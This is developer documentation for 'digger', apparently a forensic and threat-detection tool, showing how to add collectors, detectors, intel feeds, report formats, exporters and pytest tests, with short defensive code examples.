Extending digger Write a new collector, detector, framework, or intel feed.

A new collector

Subclass Collector, set the four metadata fields, yield artifacts from collect(), and register the class.

--- digger/collectors/macos/my_collector.py ---

from typing import Iterable
from digger.core.collector import Collector
from digger.core.evidence import Artifact
from digger.core.platform import OS


class SafariWebsiteDataCollector(Collector):
    name = "macos.safari_website_data"
    category = "browser"
    supported_os = (OS.MACOS,)
    requires_admin = False
    description = "Safari WebKit website data plist."

    def collect(self) -> Iterable[Artifact]:
        from pathlib import Path
        p = Path.home() / "Library/Safari/WebsiteData.plist"
        if not p.exists():
            return
        try:
            data = p.read_bytes()
        except (PermissionError, OSError):
            return
        yield self.make(
            subject=str(p),
            path=str(p),
            size=len(data),
        )

Register in digger/collectors/__init__.py in the appropriate OS-specific list:

def _macos() -> list[Collector]:
    ...
    from digger.collectors.macos.my_collector import SafariWebsiteDataCollector
    return [
        ...,
        SafariWebsiteDataCollector(),
    ]
Graceful degradation. A collector that can't read what it needs should yield nothing and return — never raise. Wrap risky calls in try/except (PermissionError, OSError, subprocess.SubprocessError). Check shutil.which() before shelling out.

A new detector

--- digger/detectors/my_detector.py ---

from typing import Iterable
from digger.core.evidence import EvidenceStore, Finding
from digger.detectors.base import Detector


class CrontabCommentDetector(Detector):
    name = "crontab_comment_anomaly"
    description = "Crontab entries with unusual commenting patterns."

    def detect(self, store: EvidenceStore) -> Iterable[Finding]:
        for art in store.iter_artifacts(collector="linux.cron"):
            contents = art["data"].get("contents") or ""
            if "###" in contents or "@@" in contents:
                yield Finding(
                    detector=self.name,
                    severity="low",
                    title=f"Unusual comment style in {art['subject']}",
                    summary="Crontab uses comment markers (###/@@) atypical for the system.",
                    artifact_refs=[art["artifact_uuid"]],
                    evidence={"path": art["data"].get("path")},
                    mitre="T1053.003",
                )

Register in digger/detectors/__init__.py:all_detectors(). Order mostly doesn't matter, but keep TimelineBuilder last.

Data-driven detector

If your detector logic is "match a list of patterns/signatures," put the patterns in YAML under digger/rules/<topic>/<file>.yaml and load them via the shared helpers:

from digger.detectors._rules_io import load_yaml, load_intel

rules = load_yaml("my_topic/my_rules.yaml")    # bundled file
live  = load_intel("my_feed_name")             # live intel cache (None if empty)

This pattern is used by shai_hulud, supply_chain, c2, and threat_actor. It keeps the rule data auditable and updatable without touching code.

A new intel feed

Add an entry to the FEEDS list in digger/intel/feeds.py:

FEEDS.append(Feed(
    name="my_corp_blocklist",
    url="https://intel.corp.example/blocklist.txt",
    interval=3600,                               # poll hourly
    parser=parse_lines,                          # uses bundled helper
    description="Internal IP blocklist maintained by corp SOC.",
    headers={"Authorization": "Bearer XXXXX"},   # if needed
))

Parsers receive raw bytes and return a JSON-serializable dict. Existing parsers cover JSON, CSV, Spamhaus-DROP-style, and one-per-line text; write your own if needed.

Detectors load the cache by name:

from digger.detectors._rules_io import load_intel

bl = load_intel("my_corp_blocklist") or {}
bad_ips = set(bl.get("entries", []))
for art in store.iter_artifacts(collector="network"):
    raddr = art["data"].get("raddr")
    if raddr and raddr[0] in bad_ips:
        yield Finding(...)

A new compliance framework

Drop a YAML file under digger/compliance/frameworks/. See the Compliance page for the predicate vocabulary and an example. No code change required — digger compliance list discovers it automatically.

A new report format

Reports are pure functions: render_X(store: EvidenceStore) -> str. Drop a module under digger/report/, expose render_…, wire it into digger/report/__init__.py and into cli.py:cmd_report's renderers dict.

A new exporter

Same pattern: pure function over the evidence store under digger/exchange/, plus a CLI sub-command in cli.py. Use digger/tradecraft/tlp.py's apply_tlp_filter() to respect sharing markings.

Tests

Drop tests under tests/ (filename test_*.py). The harness is plain pytest, no fixtures or plugins required. For collector and detector tests, build a temporary EvidenceStore on a tmp_path, seed it with synthetic artifacts, and assert on the emitted findings.

def test_my_detector_catches_x(tmp_path):
    from digger.core import Artifact, EvidenceStore
    store = EvidenceStore(tmp_path)
    store.add_artifact(Artifact(collector="processes", category="process",
                                subject="pid=1", data={"name": "evil"}))
    n = MyDetector().run(store)
    assert n >= 1
    assert any("evil" in f["title"] for f in store.iter_findings())
    store.close()

Run with:

python -m pytest tests/test_my_module.py